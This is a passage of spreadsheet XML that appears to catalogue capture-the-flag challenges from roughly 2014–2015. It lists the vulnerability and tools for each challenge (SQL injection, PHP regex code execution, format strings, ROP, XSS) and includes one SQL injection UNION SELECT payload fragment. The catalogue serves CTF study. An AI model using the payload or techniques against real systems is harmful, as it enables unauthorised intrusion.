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sheetId="1" r:id="rId3"/>
    <sheet state="visible" name="exploit" sheetId="2" r:id="rId4"/>
    <sheet state="visible" name="web" sheetId="3" r:id="rId5"/>
    <sheet state="visible" name="crypto" sheetId="4" r:id="rId6"/>
    <sheet state="visible" name="reverse" sheetId="5" r:id="rId7"/>
    <sheet state="visible" name="forensic" sheetId="6" r:id="rId8"/>
    <sheet state="visible" name="coding" sheetId="7" r:id="rId9"/>
    <sheet state="visible" name="others?" sheetId="8" r:id="rId10"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="1" name="_xlnm._FilterDatabase">exploit!$A$1:$Z$28</definedName>
  </definedNames>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9000" uniqueCount="4477">
  <si>
    <t>source</t>
  </si>
  <si>
    <t>year</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t>level</t>
  </si>
  <si>
    <t>code</t>
  </si>
  <si>
    <t>problem</t>
  </si>
  <si>
    <t>solution/vulnerabilty</t>
  </si>
  <si>
    <t>tools/libs</t>
  </si>
  <si>
    <t>Writup</t>
  </si>
  <si>
    <t>Example</t>
  </si>
  <si>
    <t>Year</t>
  </si>
  <si>
    <t>CTF</t>
  </si>
  <si>
    <t>#</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Pico</t>
  </si>
  <si>
    <t>Binary-exploitation</t>
  </si>
  <si>
    <t>internetwatch</t>
  </si>
  <si>
    <t>Crypto</t>
  </si>
  <si>
    <t>Forensics</t>
  </si>
  <si>
    <t>Master Challenge</t>
  </si>
  <si>
    <t>Miscellaneous</t>
  </si>
  <si>
    <t>Reverse-Engineering</t>
  </si>
  <si>
    <t>web50</t>
  </si>
  <si>
    <t>easy</t>
  </si>
  <si>
    <t>Web-exploitation</t>
  </si>
  <si>
    <t>php</t>
  </si>
  <si>
    <t>Php,find a hash for login</t>
  </si>
  <si>
    <t>php's == treat '0e' as 0. Use === instead</t>
  </si>
  <si>
    <t>31c1</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Pwn</t>
  </si>
  <si>
    <t>Reversing</t>
  </si>
  <si>
    <t>Signals</t>
  </si>
  <si>
    <t>Web</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>web60</t>
  </si>
  <si>
    <t>Php, execute command with php's regexp</t>
  </si>
  <si>
    <t>php's preg_replace execute code with /(.*)/e</t>
  </si>
  <si>
    <t>Asis Finals</t>
  </si>
  <si>
    <t>PPC</t>
  </si>
  <si>
    <t>web70</t>
  </si>
  <si>
    <t>Recon</t>
  </si>
  <si>
    <t>sql</t>
  </si>
  <si>
    <t>bypass admin login</t>
  </si>
  <si>
    <t>sql truncation flaw</t>
  </si>
  <si>
    <t>Stego</t>
  </si>
  <si>
    <t>Trivia</t>
  </si>
  <si>
    <t>web80</t>
  </si>
  <si>
    <t>medium</t>
  </si>
  <si>
    <t>get data via git</t>
  </si>
  <si>
    <t>recover data structure in git directory</t>
  </si>
  <si>
    <t>git</t>
  </si>
  <si>
    <t>Asis Quals</t>
  </si>
  <si>
    <t>Uncatagorized</t>
  </si>
  <si>
    <t>Boston Key Party</t>
  </si>
  <si>
    <t>web90</t>
  </si>
  <si>
    <t>tex</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>Tex, execute command with tex</t>
  </si>
  <si>
    <t>Pwning</t>
  </si>
  <si>
    <t>tex \immediate\write18 flaw</t>
  </si>
  <si>
    <t>picoctf</t>
  </si>
  <si>
    <t>comment20</t>
  </si>
  <si>
    <t>html</t>
  </si>
  <si>
    <t>Html, view commends in html</t>
  </si>
  <si>
    <t>view commends in html</t>
  </si>
  <si>
    <t>Codegate Prelims</t>
  </si>
  <si>
    <t>inspection30</t>
  </si>
  <si>
    <t>Logical</t>
  </si>
  <si>
    <t>inspect dom element</t>
  </si>
  <si>
    <t>javascript40</t>
  </si>
  <si>
    <t>javascript</t>
  </si>
  <si>
    <t>Js, run javascript</t>
  </si>
  <si>
    <t>run javascript</t>
  </si>
  <si>
    <t>toaster50</t>
  </si>
  <si>
    <t>Confindence Teaser</t>
  </si>
  <si>
    <t>Html, url encoding</t>
  </si>
  <si>
    <t>html and url encoding special chars</t>
  </si>
  <si>
    <t>http://www.ascii.cl/htmlcodes.htm</t>
  </si>
  <si>
    <t>Csaw Ctf</t>
  </si>
  <si>
    <t>Neworking</t>
  </si>
  <si>
    <t>D-Ctf</t>
  </si>
  <si>
    <t>Bonus</t>
  </si>
  <si>
    <t>Networking</t>
  </si>
  <si>
    <t>Quest</t>
  </si>
  <si>
    <t>delicious60</t>
  </si>
  <si>
    <t>cookie</t>
  </si>
  <si>
    <t>edit cookie in firefox</t>
  </si>
  <si>
    <t>Defcon CTF Finals</t>
  </si>
  <si>
    <t>injection90</t>
  </si>
  <si>
    <t>exp50</t>
  </si>
  <si>
    <t>ruby</t>
  </si>
  <si>
    <t>sql injection</t>
  </si>
  <si>
    <t>crack ruby's regexp</t>
  </si>
  <si>
    <t>face100</t>
  </si>
  <si>
    <t>ruby's regexp's /^ and $/ are \n</t>
  </si>
  <si>
    <t>perl</t>
  </si>
  <si>
    <t>Perl, invoke command via perl</t>
  </si>
  <si>
    <t>Defcon CTF Quals</t>
  </si>
  <si>
    <t>perl open pipe to execute command</t>
  </si>
  <si>
    <t>burpsuite</t>
  </si>
  <si>
    <t>Babys First</t>
  </si>
  <si>
    <t>Duchess</t>
  </si>
  <si>
    <t>password100</t>
  </si>
  <si>
    <t>Gynophage</t>
  </si>
  <si>
    <t>Hj</t>
  </si>
  <si>
    <t>Php, get flag from php</t>
  </si>
  <si>
    <t>Jymbolia</t>
  </si>
  <si>
    <t>relative path in php</t>
  </si>
  <si>
    <t>Lightning</t>
  </si>
  <si>
    <t>Selir</t>
  </si>
  <si>
    <t>Sirgoon</t>
  </si>
  <si>
    <t>Vito Geneveese</t>
  </si>
  <si>
    <t>Defkthon ctf</t>
  </si>
  <si>
    <t>exp60</t>
  </si>
  <si>
    <t>Ectf</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>Ghost in the Shellcode</t>
  </si>
  <si>
    <t>solve integer equaitons</t>
  </si>
  <si>
    <t>integer overflow</t>
  </si>
  <si>
    <t>Choose Your Pwn</t>
  </si>
  <si>
    <t>exp70</t>
  </si>
  <si>
    <t>GPN Ctf</t>
  </si>
  <si>
    <t>overflow data</t>
  </si>
  <si>
    <t>Programming</t>
  </si>
  <si>
    <t>Hack Lu Ctf</t>
  </si>
  <si>
    <t>exp80</t>
  </si>
  <si>
    <t>Exploiting</t>
  </si>
  <si>
    <t>hard</t>
  </si>
  <si>
    <t>dissemble code and trigger printf flaw</t>
  </si>
  <si>
    <t>format string</t>
  </si>
  <si>
    <t>nc, hopper</t>
  </si>
  <si>
    <t>Hack You Ctf</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>overflow50</t>
  </si>
  <si>
    <t>Hitcon Ctf</t>
  </si>
  <si>
    <t>overflow a serect in stack</t>
  </si>
  <si>
    <t>ACM</t>
  </si>
  <si>
    <t>stack overflow</t>
  </si>
  <si>
    <t>Crazy</t>
  </si>
  <si>
    <t>Game</t>
  </si>
  <si>
    <t>Puzzle</t>
  </si>
  <si>
    <t>Reverse Engineering</t>
  </si>
  <si>
    <t>Shellcode</t>
  </si>
  <si>
    <t>overflow70</t>
  </si>
  <si>
    <t>Strange</t>
  </si>
  <si>
    <t>overflow return and rop</t>
  </si>
  <si>
    <t>return-oriented programming</t>
  </si>
  <si>
    <t>NCN Ctf</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>NCN Ctf Quals</t>
  </si>
  <si>
    <t>Binary</t>
  </si>
  <si>
    <t>overflow40</t>
  </si>
  <si>
    <t>page100</t>
  </si>
  <si>
    <t>view a locked page</t>
  </si>
  <si>
    <t>xss, nc, session cookie</t>
  </si>
  <si>
    <t>nc, xss</t>
  </si>
  <si>
    <t>injection110</t>
  </si>
  <si>
    <t>Nuit Du Hack CTF</t>
  </si>
  <si>
    <t>massive120</t>
  </si>
  <si>
    <t>change post data</t>
  </si>
  <si>
    <t>injection130</t>
  </si>
  <si>
    <t>sql injection with escape</t>
  </si>
  <si>
    <t>Olympic Ctf</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>injection150</t>
  </si>
  <si>
    <t>format70</t>
  </si>
  <si>
    <t>sctf</t>
  </si>
  <si>
    <t>duck30</t>
  </si>
  <si>
    <t>php's extract() overwrite global vars</t>
  </si>
  <si>
    <t>control40</t>
  </si>
  <si>
    <t>Phydays IV Finals</t>
  </si>
  <si>
    <t>inject post data</t>
  </si>
  <si>
    <t>Phydays IV Quals</t>
  </si>
  <si>
    <t>guess75</t>
  </si>
  <si>
    <t>Admin</t>
  </si>
  <si>
    <t>Electronics</t>
  </si>
  <si>
    <t>Reverse</t>
  </si>
  <si>
    <t>Ucucuga</t>
  </si>
  <si>
    <t>Confidence</t>
  </si>
  <si>
    <t>Pwnium CTF</t>
  </si>
  <si>
    <t>web400</t>
  </si>
  <si>
    <t>execute80</t>
  </si>
  <si>
    <t>bypass login</t>
  </si>
  <si>
    <t>execute shellcode</t>
  </si>
  <si>
    <t>unserialization vul -&gt; compaison vuln -&gt; reverse printmsg()</t>
  </si>
  <si>
    <t>shellcode</t>
  </si>
  <si>
    <t>wolfram, md5, curl</t>
  </si>
  <si>
    <t>Not So Secure</t>
  </si>
  <si>
    <t>flag1</t>
  </si>
  <si>
    <t>Hidden</t>
  </si>
  <si>
    <t>php / sql</t>
  </si>
  <si>
    <t>must register an account and force admin</t>
  </si>
  <si>
    <t>SQL Column Truncation</t>
  </si>
  <si>
    <t>echo -n '' | base64 -d</t>
  </si>
  <si>
    <t>rop100</t>
  </si>
  <si>
    <t>msfelfscan -j eax</t>
  </si>
  <si>
    <t>Qiwi CTF</t>
  </si>
  <si>
    <t>Ructf Quals</t>
  </si>
  <si>
    <t>flag2</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>exploit SQL INSERT to generate error</t>
  </si>
  <si>
    <t>SQL Injection / REGEXP</t>
  </si>
  <si>
    <t>burpsuite, sqlmap , http://ha.xxor.se/2011/06/speeding-up-blind-sql-injections-using.html</t>
  </si>
  <si>
    <t>vulnerability</t>
  </si>
  <si>
    <t>Ructfe</t>
  </si>
  <si>
    <t>Seccon Ctf</t>
  </si>
  <si>
    <t>Exploit</t>
  </si>
  <si>
    <t>QR</t>
  </si>
  <si>
    <t>Start</t>
  </si>
  <si>
    <t>Secuinside Prequal</t>
  </si>
  <si>
    <t>lottery</t>
  </si>
  <si>
    <t>Brain Fuzzer</t>
  </si>
  <si>
    <t>1234567890th visitor wins prize</t>
  </si>
  <si>
    <t>echo -n '1234567890' | md5sum</t>
  </si>
  <si>
    <t>Mobile</t>
  </si>
  <si>
    <t>Speedgame</t>
  </si>
  <si>
    <t>Su CTF Quals</t>
  </si>
  <si>
    <t>Real</t>
  </si>
  <si>
    <t>Secure-Coding</t>
  </si>
  <si>
    <t>Tiny CTF</t>
  </si>
  <si>
    <t>nooverflow140</t>
  </si>
  <si>
    <t>read()'s third arg count is unsinged</t>
  </si>
  <si>
    <t>Volga Quals</t>
  </si>
  <si>
    <t>voting</t>
  </si>
  <si>
    <t>Joy</t>
  </si>
  <si>
    <t>SQL Inject Modified OS Packet</t>
  </si>
  <si>
    <t>SQL injection</t>
  </si>
  <si>
    <t>whatflag140</t>
  </si>
  <si>
    <t>Stegasic</t>
  </si>
  <si>
    <t>def-con-ctf-qualifier</t>
  </si>
  <si>
    <t>routarded</t>
  </si>
  <si>
    <t>js</t>
  </si>
  <si>
    <t>Hack in the Box</t>
  </si>
  <si>
    <t>access server directory</t>
  </si>
  <si>
    <t>disable js in browser</t>
  </si>
  <si>
    <t>codegate-preliminary</t>
  </si>
  <si>
    <t>bestshell160</t>
  </si>
  <si>
    <t>overflow function pointer</t>
  </si>
  <si>
    <t>Stripe Ctf</t>
  </si>
  <si>
    <t>crudecrypt180</t>
  </si>
  <si>
    <t>0ctf-2015</t>
  </si>
  <si>
    <t>nevernote180</t>
  </si>
  <si>
    <t>obo90</t>
  </si>
  <si>
    <t>comparison error, array overflow</t>
  </si>
  <si>
    <t>web</t>
  </si>
  <si>
    <t>bypass session limit</t>
  </si>
  <si>
    <t>crypto</t>
  </si>
  <si>
    <t>exploit</t>
  </si>
  <si>
    <t>misc</t>
  </si>
  <si>
    <t>mobile</t>
  </si>
  <si>
    <t>reverse</t>
  </si>
  <si>
    <t>32c3-ctf-2015</t>
  </si>
  <si>
    <t>embedded</t>
  </si>
  <si>
    <t>forensics</t>
  </si>
  <si>
    <t>pwn</t>
  </si>
  <si>
    <t>reversing</t>
  </si>
  <si>
    <t>web proxy</t>
  </si>
  <si>
    <t>9447-ctf-2015</t>
  </si>
  <si>
    <t>exploitation</t>
  </si>
  <si>
    <t>CRLF injection</t>
  </si>
  <si>
    <t>steganography</t>
  </si>
  <si>
    <t>asis-finals-ctf-2015</t>
  </si>
  <si>
    <t>forensic</t>
  </si>
  <si>
    <t>csaw-ctf</t>
  </si>
  <si>
    <t>big data</t>
  </si>
  <si>
    <t>trivia</t>
  </si>
  <si>
    <t>network</t>
  </si>
  <si>
    <t>intercept package stream of password</t>
  </si>
  <si>
    <t>asis-quals-ctf-2015</t>
  </si>
  <si>
    <t>fuzzyll</t>
  </si>
  <si>
    <t>dota</t>
  </si>
  <si>
    <t>look into match history of dota player fuzzyll</t>
  </si>
  <si>
    <t>31c3</t>
  </si>
  <si>
    <t>stego</t>
  </si>
  <si>
    <t>backdoor-ctf-2015</t>
  </si>
  <si>
    <t>binary</t>
  </si>
  <si>
    <t>rick</t>
  </si>
  <si>
    <t>bctf-2015</t>
  </si>
  <si>
    <t>boston-key-party-2015</t>
  </si>
  <si>
    <t xml:space="preserve">Use SQL Honeypot 'Kippo' to view passwords of host. </t>
  </si>
  <si>
    <t>pwning</t>
  </si>
  <si>
    <t>linux commands: 'tail', 'curl'. SQL Honeypot Kippo</t>
  </si>
  <si>
    <t>school-bus</t>
  </si>
  <si>
    <t>https://ctfcrew.org/writeup/95</t>
  </si>
  <si>
    <t>break-in-ctf-2015</t>
  </si>
  <si>
    <t>bsides-vancouver-ctf-2015</t>
  </si>
  <si>
    <t>ownable</t>
  </si>
  <si>
    <t>sandbox</t>
  </si>
  <si>
    <t>camp-ctf-2015</t>
  </si>
  <si>
    <t>5chan</t>
  </si>
  <si>
    <t xml:space="preserve">sql </t>
  </si>
  <si>
    <t>codegate-ctf-2015</t>
  </si>
  <si>
    <t>find hidden image on messageboard</t>
  </si>
  <si>
    <t>pwnable</t>
  </si>
  <si>
    <t>examine robots.txt, leads you to sql database</t>
  </si>
  <si>
    <t>NCN</t>
  </si>
  <si>
    <t>robots.txt</t>
  </si>
  <si>
    <t>XMLRPC</t>
  </si>
  <si>
    <t>devilish</t>
  </si>
  <si>
    <t>python</t>
  </si>
  <si>
    <t>flag contained on xmlrpc server</t>
  </si>
  <si>
    <t>remote code injection</t>
  </si>
  <si>
    <t>grab username / password from online profile</t>
  </si>
  <si>
    <t>nmap ,pyth lib xmlrpc</t>
  </si>
  <si>
    <t>codegate-ctf-junior-2015</t>
  </si>
  <si>
    <t>sql injects through endpoint</t>
  </si>
  <si>
    <t>confidence-ctf-teaser-2015</t>
  </si>
  <si>
    <t>csaw-ctf-2015</t>
  </si>
  <si>
    <t>http</t>
  </si>
  <si>
    <t>heart</t>
  </si>
  <si>
    <t>mono</t>
  </si>
  <si>
    <t>recon</t>
  </si>
  <si>
    <t>retrieve flag from user on server</t>
  </si>
  <si>
    <t>exploit "data" service</t>
  </si>
  <si>
    <t>Simple Asembly Explorer, ILSpy</t>
  </si>
  <si>
    <t>Understand website and security implementation</t>
  </si>
  <si>
    <t xml:space="preserve">GET request for password </t>
  </si>
  <si>
    <t>csaw-finals-ctf-2015</t>
  </si>
  <si>
    <t xml:space="preserve">31c3 </t>
  </si>
  <si>
    <t>page builder</t>
  </si>
  <si>
    <t>php, sql, css</t>
  </si>
  <si>
    <t>exploit webpage that allows user to upload css webpages</t>
  </si>
  <si>
    <t>pidometer</t>
  </si>
  <si>
    <t>XSS through PHP</t>
  </si>
  <si>
    <t>grabbag</t>
  </si>
  <si>
    <t>pCRAPp</t>
  </si>
  <si>
    <t>retrieve flag from pidometer web servce</t>
  </si>
  <si>
    <t>connect to redis service and extract flags</t>
  </si>
  <si>
    <t>exploit php</t>
  </si>
  <si>
    <t xml:space="preserve">remove space in the nullbyte </t>
  </si>
  <si>
    <t>cyber-security-challenge-2015</t>
  </si>
  <si>
    <t>gen security knowledge</t>
  </si>
  <si>
    <t>mobile app knowledge</t>
  </si>
  <si>
    <t>100lines</t>
  </si>
  <si>
    <t>bashful</t>
  </si>
  <si>
    <t>secure-coding</t>
  </si>
  <si>
    <t>disassemble code and optimize memory use</t>
  </si>
  <si>
    <t>Flag stored in github package</t>
  </si>
  <si>
    <t>web-app-security</t>
  </si>
  <si>
    <t>reverse loop function</t>
  </si>
  <si>
    <t>download package and extract with 'git unpack-objects'</t>
  </si>
  <si>
    <t>hopper</t>
  </si>
  <si>
    <t xml:space="preserve">github, wget, </t>
  </si>
  <si>
    <t>coffee</t>
  </si>
  <si>
    <t>dctf-2015</t>
  </si>
  <si>
    <t>exploit nodejs / express webapp</t>
  </si>
  <si>
    <t>basic No_SQL injection</t>
  </si>
  <si>
    <t>ghost-in-the-shellcode</t>
  </si>
  <si>
    <t>defcon-qualifier-ctf-2015</t>
  </si>
  <si>
    <t>byhd</t>
  </si>
  <si>
    <t>disassemble code and</t>
  </si>
  <si>
    <t>hopper, python script</t>
  </si>
  <si>
    <t>dosfun4u-round-2</t>
  </si>
  <si>
    <t>babys-first</t>
  </si>
  <si>
    <t>c/x86</t>
  </si>
  <si>
    <t>ctf247</t>
  </si>
  <si>
    <t>find the key on a file</t>
  </si>
  <si>
    <t>easyctf-2015</t>
  </si>
  <si>
    <t>dosfun4u</t>
  </si>
  <si>
    <t>command injection</t>
  </si>
  <si>
    <t>linux</t>
  </si>
  <si>
    <t>Hack-lu-ctf</t>
  </si>
  <si>
    <t>programming</t>
  </si>
  <si>
    <t>encrypted</t>
  </si>
  <si>
    <t>change dhrel query</t>
  </si>
  <si>
    <t>ekoparty-ctf-2015</t>
  </si>
  <si>
    <t>Hotcows dating</t>
  </si>
  <si>
    <t>premium membership</t>
  </si>
  <si>
    <t>(XSS)cross site scripting, .git</t>
  </si>
  <si>
    <t>ekoparty-pre-ctf-2015</t>
  </si>
  <si>
    <t>heap</t>
  </si>
  <si>
    <t>heap overflow</t>
  </si>
  <si>
    <t>overflow heap</t>
  </si>
  <si>
    <t>exodus-adventure</t>
  </si>
  <si>
    <t>Only contained loose files</t>
  </si>
  <si>
    <t>git config --local --bool core.bare false; git checkout -f</t>
  </si>
  <si>
    <t>faust-ad-ctf-2015</t>
  </si>
  <si>
    <t>All but one folder is empty</t>
  </si>
  <si>
    <t>sftp</t>
  </si>
  <si>
    <t>download and upload files to a server</t>
  </si>
  <si>
    <t>data overflow</t>
  </si>
  <si>
    <t>ghost-in-the-shellcode-2015</t>
  </si>
  <si>
    <t>ImageUpload</t>
  </si>
  <si>
    <t>EXIF data</t>
  </si>
  <si>
    <t>SQL injection through EXIF data</t>
  </si>
  <si>
    <t>shitsco</t>
  </si>
  <si>
    <t>hack-dat-kiwi-ctf-2015</t>
  </si>
  <si>
    <t>experimental</t>
  </si>
  <si>
    <t>Killy the bit</t>
  </si>
  <si>
    <t>Query injection</t>
  </si>
  <si>
    <t>hack-lu-ctf-2015</t>
  </si>
  <si>
    <t>turdedo</t>
  </si>
  <si>
    <t>coding</t>
  </si>
  <si>
    <t>exploiting</t>
  </si>
  <si>
    <t>Next global backdoor</t>
  </si>
  <si>
    <t>get proper request form</t>
  </si>
  <si>
    <t>hack-con-2015</t>
  </si>
  <si>
    <t>Wanted: translator</t>
  </si>
  <si>
    <t>port</t>
  </si>
  <si>
    <t>secure-hobby</t>
  </si>
  <si>
    <t>connect with correct port and protocol commands</t>
  </si>
  <si>
    <t>Login and find secret</t>
  </si>
  <si>
    <t>get admin key</t>
  </si>
  <si>
    <t>hackover-ctf-2015</t>
  </si>
  <si>
    <t>pwnable200</t>
  </si>
  <si>
    <t>haxdump-ctf-2015</t>
  </si>
  <si>
    <t>x86</t>
  </si>
  <si>
    <t xml:space="preserve">given simple math executable, get flag. </t>
  </si>
  <si>
    <t>Daltons-corporate-security-safe-for-business</t>
  </si>
  <si>
    <t>gdb</t>
  </si>
  <si>
    <t>find randomized captcha</t>
  </si>
  <si>
    <t>hitcon-ctf-quals-2015</t>
  </si>
  <si>
    <t>Hidden in plain sight</t>
  </si>
  <si>
    <t>access token encrypted</t>
  </si>
  <si>
    <t>find correct access token</t>
  </si>
  <si>
    <t>5h311</t>
  </si>
  <si>
    <t>Connect to online service, get flag</t>
  </si>
  <si>
    <t>global variable vunl / set global variable to equal 1</t>
  </si>
  <si>
    <t xml:space="preserve">gdb, hopper, ida, linux commands: 'set', 'puts' </t>
  </si>
  <si>
    <t>Objection</t>
  </si>
  <si>
    <t>token</t>
  </si>
  <si>
    <t>use broken function to access admin token</t>
  </si>
  <si>
    <t>Ibteam-blackvalentine-ctf-2015</t>
  </si>
  <si>
    <t>VolgaCTF-quals</t>
  </si>
  <si>
    <t>Web-100</t>
  </si>
  <si>
    <t>successfully login and access file</t>
  </si>
  <si>
    <t>use session id as link and refresh page</t>
  </si>
  <si>
    <t>Web-200</t>
  </si>
  <si>
    <t>icectf-2015</t>
  </si>
  <si>
    <t>exploit strcmp function</t>
  </si>
  <si>
    <t>ictf-ad-2015</t>
  </si>
  <si>
    <t>All the folders are empty</t>
  </si>
  <si>
    <t>inc0gnito-ctf-2015</t>
  </si>
  <si>
    <t>tinyCTF</t>
  </si>
  <si>
    <t>Whatg is Loop landscapes?</t>
  </si>
  <si>
    <t>future</t>
  </si>
  <si>
    <t>insomni-hack-ctf-2015</t>
  </si>
  <si>
    <t>Find flag on server running futuristic protocols</t>
  </si>
  <si>
    <t>hardware</t>
  </si>
  <si>
    <t xml:space="preserve">connect to server using IPV6 and SCTP, find open SCTP port. </t>
  </si>
  <si>
    <t>https://tunnelbroker.net/ , nmap</t>
  </si>
  <si>
    <t>mma-ctf-2015</t>
  </si>
  <si>
    <t>nosql</t>
  </si>
  <si>
    <t>Find flag on webserver given valid packets</t>
  </si>
  <si>
    <t>Replay attack / ECB vuln</t>
  </si>
  <si>
    <t>wireshark</t>
  </si>
  <si>
    <t>ppc</t>
  </si>
  <si>
    <t>ramble</t>
  </si>
  <si>
    <t xml:space="preserve">medium </t>
  </si>
  <si>
    <t>Grab flag from online photolog</t>
  </si>
  <si>
    <t>take control of global variable to set website language to LC_ALL</t>
  </si>
  <si>
    <t>nui-du-hack-ctf-quals-2015</t>
  </si>
  <si>
    <t>null-con-hackim-2015</t>
  </si>
  <si>
    <t>opentoall-ctf-2015</t>
  </si>
  <si>
    <t>plaidctf-2015</t>
  </si>
  <si>
    <t>tumorous</t>
  </si>
  <si>
    <t>Find flag from an unlisted git dirctory</t>
  </si>
  <si>
    <t>write several scripts to rip git directory</t>
  </si>
  <si>
    <t>polictf-2015</t>
  </si>
  <si>
    <t>Grab-bag</t>
  </si>
  <si>
    <t>pragyan-ctf-2015</t>
  </si>
  <si>
    <t>android</t>
  </si>
  <si>
    <t>git, https://github.com/kost/dvcs-ripper</t>
  </si>
  <si>
    <t>pwnium</t>
  </si>
  <si>
    <t>guest book</t>
  </si>
  <si>
    <t>Get flag from online webapp</t>
  </si>
  <si>
    <t xml:space="preserve">SQL Injection </t>
  </si>
  <si>
    <t>rctf-quals-2015</t>
  </si>
  <si>
    <t>XWebSite</t>
  </si>
  <si>
    <t>xpath</t>
  </si>
  <si>
    <t>Inject field of vuln web app</t>
  </si>
  <si>
    <t>secuinside</t>
  </si>
  <si>
    <t>simple login</t>
  </si>
  <si>
    <t>survey</t>
  </si>
  <si>
    <t>login as admin to website</t>
  </si>
  <si>
    <t>bruteforce cookie generation to get admin password</t>
  </si>
  <si>
    <t>ructf-ad-2015</t>
  </si>
  <si>
    <t>The greatest physicists</t>
  </si>
  <si>
    <t>find the flag</t>
  </si>
  <si>
    <t>Xpath injection to retrieve admin login</t>
  </si>
  <si>
    <t>Hack-you</t>
  </si>
  <si>
    <t>Web 100</t>
  </si>
  <si>
    <t>sctf-2015</t>
  </si>
  <si>
    <t>votes</t>
  </si>
  <si>
    <t>bypass is_numeric() function and inject code</t>
  </si>
  <si>
    <t>cfy</t>
  </si>
  <si>
    <t>-+++++++</t>
  </si>
  <si>
    <t xml:space="preserve">Attack webserver that has output 'parse from pointer' </t>
  </si>
  <si>
    <t>school-ctf-2015</t>
  </si>
  <si>
    <t>overflow global data</t>
  </si>
  <si>
    <t>Web 200</t>
  </si>
  <si>
    <t>LFI</t>
  </si>
  <si>
    <t>perl open() commands allows injection with pipes</t>
  </si>
  <si>
    <t>joy</t>
  </si>
  <si>
    <t>networks</t>
  </si>
  <si>
    <t>Web 300</t>
  </si>
  <si>
    <t>firebird</t>
  </si>
  <si>
    <t>firebird syntax</t>
  </si>
  <si>
    <t>school-ctf-winter-2015</t>
  </si>
  <si>
    <t>python script to brute force firebird injection for users and passwords</t>
  </si>
  <si>
    <t>admin</t>
  </si>
  <si>
    <t>D-ctf</t>
  </si>
  <si>
    <t>TimThumb</t>
  </si>
  <si>
    <t>linux command: 'file' , gdb</t>
  </si>
  <si>
    <t>append script to image file</t>
  </si>
  <si>
    <t>seccon-quals-ctf-2015</t>
  </si>
  <si>
    <t>maze</t>
  </si>
  <si>
    <t xml:space="preserve">hard </t>
  </si>
  <si>
    <t>Given a text based maze game, pwn your way to the flag</t>
  </si>
  <si>
    <t>off by one' stack overflow</t>
  </si>
  <si>
    <t>checksec.sh, hexrays x64</t>
  </si>
  <si>
    <t>Web 400</t>
  </si>
  <si>
    <t>http://www.clevcode.org/31c3-ctf-maze-write-up/</t>
  </si>
  <si>
    <t>unoconv, php shell</t>
  </si>
  <si>
    <t>Nuit-du-hack</t>
  </si>
  <si>
    <t>Abitbol</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>XHR request/cookie request</t>
  </si>
  <si>
    <t>carbonara</t>
  </si>
  <si>
    <t>tncms</t>
  </si>
  <si>
    <t>mynx</t>
  </si>
  <si>
    <t>attack an ascii art server and gain execution</t>
  </si>
  <si>
    <t>call to system() via 'off by one' stack overflow, format string vuln.</t>
  </si>
  <si>
    <t>use javascript console and unscramble function</t>
  </si>
  <si>
    <t>unscramble</t>
  </si>
  <si>
    <t>Big momma</t>
  </si>
  <si>
    <t>gives strcmp() return value</t>
  </si>
  <si>
    <t>use strcmp() to derive username one character at a time</t>
  </si>
  <si>
    <t>nokia-1337</t>
  </si>
  <si>
    <t>sql, arm</t>
  </si>
  <si>
    <t>onion-rings</t>
  </si>
  <si>
    <t xml:space="preserve">gain access to a nokia cellphone </t>
  </si>
  <si>
    <t>global data overflow</t>
  </si>
  <si>
    <t>custom python tool to automate input</t>
  </si>
  <si>
    <t>onion</t>
  </si>
  <si>
    <t>tor browser</t>
  </si>
  <si>
    <t xml:space="preserve">enter valid directory </t>
  </si>
  <si>
    <t>titanoreine</t>
  </si>
  <si>
    <t>include payload</t>
  </si>
  <si>
    <t>find suspicious include in payload</t>
  </si>
  <si>
    <t>Qiwi-ctf</t>
  </si>
  <si>
    <t>bajutsu</t>
  </si>
  <si>
    <t>restricted shell</t>
  </si>
  <si>
    <t>use python to search for flag backwards</t>
  </si>
  <si>
    <t>stolen prototype</t>
  </si>
  <si>
    <t>jar</t>
  </si>
  <si>
    <t>pong</t>
  </si>
  <si>
    <t>no connection</t>
  </si>
  <si>
    <t>use POST with correct port</t>
  </si>
  <si>
    <t>lua</t>
  </si>
  <si>
    <t>dex2jar ; adb logcat</t>
  </si>
  <si>
    <t>remote execute code on a server running an lua version of pong</t>
  </si>
  <si>
    <t>Seccon</t>
  </si>
  <si>
    <t>format string vuln</t>
  </si>
  <si>
    <t>binary karuta</t>
  </si>
  <si>
    <t>https://fail0verflow.com/blog/2014/31c3ctf-pwn30-pong.html</t>
  </si>
  <si>
    <t>unknown architechture</t>
  </si>
  <si>
    <t>Naive Bayes Classifier</t>
  </si>
  <si>
    <t>NLTK</t>
  </si>
  <si>
    <t>saas</t>
  </si>
  <si>
    <t>Bleeding “Heartbleed” Test Web</t>
  </si>
  <si>
    <t>remote execute code on a server running sorting algorithms</t>
  </si>
  <si>
    <t>exploit std::sort, heap spray, memory corruption</t>
  </si>
  <si>
    <t>sqlite</t>
  </si>
  <si>
    <t>hidden in table</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION SELECT flag from ssFLGss WHERE 1=1 OR '1' LIKE '</t>
  </si>
  <si>
    <t>Get from curious “FTP” server</t>
  </si>
  <si>
    <t>ftp</t>
  </si>
  <si>
    <t>exercises</t>
  </si>
  <si>
    <t>connect with nc to navigate to file</t>
  </si>
  <si>
    <t>get the key</t>
  </si>
  <si>
    <t>basic authentication</t>
  </si>
  <si>
    <t>unknown</t>
  </si>
  <si>
    <t>capture login packet, go to key.html</t>
  </si>
  <si>
    <t>rea-juu watch</t>
  </si>
  <si>
    <t>user</t>
  </si>
  <si>
    <t>take quiz as user 1</t>
  </si>
  <si>
    <t>Plaid-ctf</t>
  </si>
  <si>
    <t>bronies</t>
  </si>
  <si>
    <t>securinets-ctf-2015</t>
  </si>
